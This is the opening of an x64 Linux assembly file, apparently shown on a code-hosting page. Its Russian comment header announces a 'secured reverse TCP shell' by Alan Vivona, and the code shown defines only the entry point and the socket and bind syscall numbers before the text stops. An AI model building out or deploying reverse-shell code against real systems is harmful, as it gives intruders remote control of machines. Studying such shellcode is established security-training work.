This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; ================================================= | |
; Защищённый реверсивный TCP шелл для Linux x64 | |
; Author: Alan Vivona | |
; ================================================= | |
global _start | |
; Номера системных вызовов | |
syscalls.socket equ 0x29 | |
syscalls.bind equ 0x31 |